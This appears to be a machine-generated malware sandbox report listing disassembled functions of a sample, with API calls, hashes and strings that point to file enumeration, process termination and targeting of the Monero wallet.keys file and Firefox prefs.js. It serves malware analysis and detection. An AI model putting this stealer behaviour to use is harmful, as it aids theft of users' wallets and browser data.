Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: deab5107c44f0865a061a0501bffdf5d77640f77acc80f9a652a6b42caa932c9
Instruction ID: bb4ffc559e934a7e9818e618e396702051da3e7fdc14aaee2408ea23f3e83e19
Opcode Fuzzy Hash: deab5107c44f0865a061a0501bffdf5d77640f77acc80f9a652a6b42caa932c9
Instruction Fuzzy Hash: 5EE1F2729512189ADB58FBA0CCA2EEF733AAF54340F4045DDB50A620D2EF706B89CF55

Function 00630098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON

Download Yara Rule

Strings

2-by, xrefs: 0063036E
2-by, xrefs: 006300F6
expa, xrefs: 00630461
nd 3, xrefs: 00630117
te knd 3expand 32-by, xrefs: 0063034E
te k, xrefs: 0063053E
te k, xrefs: 006303B4
expand 32-by, xrefs: 006303C8
te k, xrefs: 00630347
2-byexpa, xrefs: 00630355
expa, xrefs: 006305BB
expand 3, xrefs: 006304E5
nd 32-by, xrefs: 006304B4

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
API String ID: 0-1562099544
Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
Instruction ID: 14ed6e9a5df9f90b97bcd1bd75f4f55e38442a601406d0774317decb8fdf4313
Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
Instruction Fuzzy Hash: 8CE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56

Function 005FF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006116B0,00610D97), ref: 005FF81E
StrCmpCA.SHLWAPI(?,006116B4), ref: 005FF86F
StrCmpCA.SHLWAPI(?,006116B8), ref: 005FF885
FindNextFileA.KERNEL32(000000FF,?), ref: 005FFBB1
FindClose.KERNEL32(000000FF), ref: 005FFBC3

Strings

prefs.js, xrefs: 005FF912

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 22a60feb4f11dd6aa7b75d6f4d4c7f95f497fb41d9d8a7d750a315acdc2d3a86
Instruction ID: 1239117d19c137f9e83bd5c0e6b84a9cb13110d889514df680bc307c8e4638f8
Opcode Fuzzy Hash: 22a60feb4f11dd6aa7b75d6f4d4c7f95f497fb41d9d8a7d750a315acdc2d3a86
Instruction Fuzzy Hash: 0EB15171A402089BCB68FFA0DD96EEF777AAF54340F4085ACA50A561D1EF305B88CF95

Function 005F1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0061523C,?,?,?,006152E4,?,?,00000000,?,00000000), ref: 005F1963
StrCmpCA.SHLWAPI(?,0061538C), ref: 005F19B3
StrCmpCA.SHLWAPI(?,00615434), ref: 005F19C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005F1D80
DeleteFileA.KERNEL32(00000000), ref: 005F1E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 005F1E60
FindClose.KERNEL32(000000FF), ref: 005F1E72

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Strings

\*.*, xrefs: 005F1831

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 78621effb803fc67ee07d56ebbde7d2096beccabe0a86cf5a8f9922f4cf504e4
Instruction ID: 0a9cdc9dddb4b1cf37704252a97bff48c5db632226e73c0d98e88e3c278e1735
Opcode Fuzzy Hash: 78621effb803fc67ee07d56ebbde7d2096beccabe0a86cf5a8f9922f4cf504e4
Instruction Fuzzy Hash: 9412CC729502189BCB59FBA0CCA6AFF737AAF54340F4045DDA10A620D1EF746B88CF65

Function 005FDF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00610C32), ref: 005FDF5E
StrCmpCA.SHLWAPI(?,006115C0), ref: 005FDFAE
StrCmpCA.SHLWAPI(?,006115C4), ref: 005FDFC4
FindNextFileA.KERNEL32(000000FF,?), ref: 005FE4E0
FindClose.KERNEL32(000000FF), ref: 005FE4F2

Strings

\*.*, xrefs: 005FDF26

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 486cea9ad92ce75b6ad7443e9831ad90b00e5a399aaccd1d5c00146d5d0fc7c2
Instruction ID: aae260b8640e2615185bbef66aabe4411bd2f17f6fd5df998cdf48c304563f20
Opcode Fuzzy Hash: 486cea9ad92ce75b6ad7443e9831ad90b00e5a399aaccd1d5c00146d5d0fc7c2
Instruction Fuzzy Hash: 91F1BE719642189ACB59FBA0CDA6EEF733ABF54340F8045DDA10A620D1EF706B88CF55

Function 005FDB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006115A8,00610BAF), ref: 005FDBEB
StrCmpCA.SHLWAPI(?,006115AC), ref: 005FDC33
StrCmpCA.SHLWAPI(?,006115B0), ref: 005FDC49
FindNextFileA.KERNEL32(000000FF,?), ref: 005FDECC
FindClose.KERNEL32(000000FF), ref: 005FDEDE

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 2395f563074636f3c4964363955e65ebbde80ec6f8ddab39e87a5939488a468f
Instruction ID: 4668fca3ab32f87dfd841be289aa27534cd7fe2b63e101d7d9053bf1707adb62
Opcode Fuzzy Hash: 2395f563074636f3c4964363955e65ebbde80ec6f8ddab39e87a5939488a468f
Instruction Fuzzy Hash: C0912372A502089BCB58FBB0DD569FE777EAB84340F40866CF907561C1EE349B48CB96

Function 006098E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00609905
Process32First.KERNEL32(005F9FDE,00000128), ref: 00609919
Process32Next.KERNEL32(005F9FDE,00000128), ref: 0060992E
StrCmpCA.SHLWAPI(?,005F9FDE), ref: 00609943
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0060995C
TerminateProcess.KERNEL32(00000000,00000000), ref: 0060997A
CloseHandle.KERNEL32(00000000), ref: 00609987
CloseHandle.KERNEL32(005F9FDE), ref: 00609993

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 4a41ea7571caf0573e3f0b03cd9712413fe335733c17797dc169cfb0bfade97b
Instruction ID: cc7089ebc6116ccb95841016cdde1c97ee76561fef09046c92ab4ccb9ba0d5a3
Opcode Fuzzy Hash: 4a41ea7571caf0573e3f0b03cd9712413fe335733c17797dc169cfb0bfade97b
Instruction Fuzzy Hash: 3411EF75904218ABDB24DFA5DC48FDEB77ABB48701F04458CF506A6280D7749A84CFA0

Function 00A41A4C Relevance: 11.6, Strings: 8, Instructions: 1641COMMON

Download Yara Rule

Strings

$p'{, xrefs: 00A4213B
:_}, xrefs: 00A42692
D!x, xrefs: 00A42299
8Kw+, xrefs: 00A424BA
cUoo, xrefs: 00A42AAC
6_G, xrefs: 00A41ACB
K~o3, xrefs: 00A42CD9
"bGg, xrefs: 00A42AA3

Memory Dump Source

Source File: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: "bGg$$p'{$6_G$8Kw+$:_}$D!x$K~o3$cUoo
API String ID: 0-1948594022
Opcode ID: 56fe7d4bd5dee54bfb10c89020c4b1d92533353b3841ba54aed1bf78ef611a4c
Instruction ID: 2df5bb9d96efe9da390685b9f69f6f9b964b2b84eafd0ed4d17b4aea543a3c01
Opcode Fuzzy Hash: 56fe7d4bd5dee54bfb10c89020c4b1d92533353b3841ba54aed1bf78ef611a4c
Instruction Fuzzy Hash: 27B217F360C204AFE7046E2DEC8567EBBE5EF94720F1A4A3DE6C5C3744E63598018696

Function 00607D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

GetKeyboardLayoutList.USER32(00000000,00000000,006105B7), ref: 00607D71
LocalAlloc.KERNEL32(00000040,?), ref: 00607D89
GetKeyboardLayoutList.USER32(?,00000000), ref: 00607D9D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00607DF2
LocalFree.KERNEL32(00000000), ref: 00607EB2

Strings

/ , xrefs: 00607E0F

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: aee51c82c0919c8868d74613e5e42dd6b0305968fc6ef69d9188982d568766bc
Instruction ID: bb38b160a42fb477c97448a1069607a16a3da1dc7d1d471152d5a1f6c664778b
Opcode Fuzzy Hash: aee51c82c0919c8868d74613e5e42dd6b0305968fc6ef69d9188982d568766bc
Instruction Fuzzy Hash: D0413A71981218ABDB68EB94DC99BEEB37AFF44700F1041D9E00A622D1DB742F84CF65

Function 00A3935D Relevance: 10.4, Strings: 7, Instructions: 1662COMMON

Download Yara Rule

Strings

K_, xrefs: 00A3A052
+z}, xrefs: 00A39781
M}7, xrefs: 00A3A635
g+Y, xrefs: 00A3937C
||oG, xrefs: 00A3A398
_zD, xrefs: 00A39E43
Aw7, xrefs: 00A3A136

Memory Dump Source

Source File: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: +z}$Aw7$_zD$g+Y$||oG$K_$M}7
API String ID: 0-792419100
Opcode ID: 8be8f83b43eaeb26e2d9a25132da4c0c30b98d7eefa0a503f867556b887ade97
Instruction ID: 3b2f1c39b9767d0138c632ad5dfd327adff889c698d110f2f6facb179ff0226f
Opcode Fuzzy Hash: 8be8f83b43eaeb26e2d9a25132da4c0c30b98d7eefa0a503f867556b887ade97
Instruction Fuzzy Hash: 95B206F360C2049FE304AE2DEC8567AFBE9EF94620F16893DE6C5C7744EA3558018696

Function 00A40088 Relevance: 10.3, Strings: 7, Instructions: 1584COMMON

Download Yara Rule

Strings

m?P, xrefs: 00A410DF
0c, xrefs: 00A4133E
y!j_, xrefs: 00A4124A
5f~, xrefs: 00A4122F
_zD, xrefs: 00A40B30
QXov, xrefs: 00A40090
}z, xrefs: 00A40ADA

Memory Dump Source

Source File: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
